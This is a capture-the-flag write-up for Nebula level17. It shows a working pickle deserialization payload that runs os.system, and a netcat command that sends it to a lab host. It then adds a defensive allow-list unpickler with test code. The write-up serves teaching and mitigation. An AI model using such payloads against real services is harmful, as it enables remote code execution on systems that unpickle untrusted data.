In level17 of the Nebula wargame, we are given a Python script. The type of vulnerability should be obvious as soon as we see "import pickle".
Pickle is the object serialization module for Python. It has always been known to be insecure when fed untrusted input, because there are no restrictions on the objects that are deserialized: a pickle stream can name any importable callable and the unpickler will import and call it. There was a great presentation at Blackhat 2011 about Python shellcoding from SensePost. Here is the payload we will be using
kroosec@dojo:~$ cat pwn17
cos
system
(S'getflag > /tmp/pwnie17'
tR.
which, when deserialized, is equivalent to os.system("getflag > /tmp/pwnie17"): "c" imports os.system as a global, "S" pushes the command string, "(" and "t" wrap it in a tuple, and "R" calls the global with that tuple as its arguments. We will send the exploit with netcat.
kroosec@dojo:~$ nc 192.168.56.101 10007 < pwn17
level17@nebula:~$ cat /tmp/pwnie17
You have successfully executed getflag on a target account
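As an added example (not part of the original writeup, and not the level17 daemon's code), here is how a service like this one could have refused the payload above: a pickle.Unpickler subclass that overrides find_class with an allow-list, so the GLOBAL opcode naming os.system is rejected before REDUCE ever runs. The protocol-0 payload bytes and the benign dict below are constructed for the demonstration; the command string in the payload is harmless and is never executed.

```python
import io
import pickle

# Allow-list of (module, name) pairs the unpickler may resolve. Anything
# else, os.system included, is refused before any object is built.
SAFE_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
    ("builtins", "str"),
    ("builtins", "int"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves allow-listed globals.

    find_class is what the GLOBAL ("c") opcode calls, so rejecting here
    stops the stream before the REDUCE ("R") opcode can invoke anything.
    """

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve global {module}.{name}"
        )


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that uses the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Constructed payload in the same protocol-0 text form as the level17
# writeup: GLOBAL os.system, push a string, TUPLE, REDUCE. The command is
# deliberately harmless; the point is that it is never reached.
CONSTRUCTED_PAYLOAD = b"cos\nsystem\n(S'echo constructed'\ntR."

# Constructed benign blob: plain containers and scalars never go through
# find_class, so they load fine under the restricted unpickler.
BENIGN_PICKLE = pickle.dumps({"user": "level17", "score": 17})


def classify(data: bytes) -> str:
    """Return 'ok' if the blob loads under the restricted unpickler and
    'rejected' if it references a global outside the allow-list."""
    try:
        restricted_loads(data)
        return "ok"
    except pickle.UnpicklingError:
        return "rejected"


if __name__ == "__main__":
    print("payload:", classify(CONSTRUCTED_PAYLOAD))   # rejected
    print("benign :", classify(BENIGN_PICKLE))         # ok
```

The allow-list approach is the mitigation the Python documentation itself recommends when pickle cannot be avoided; the stronger fix for a network service is to not accept pickle from the socket at all and use a data-only format such as JSON.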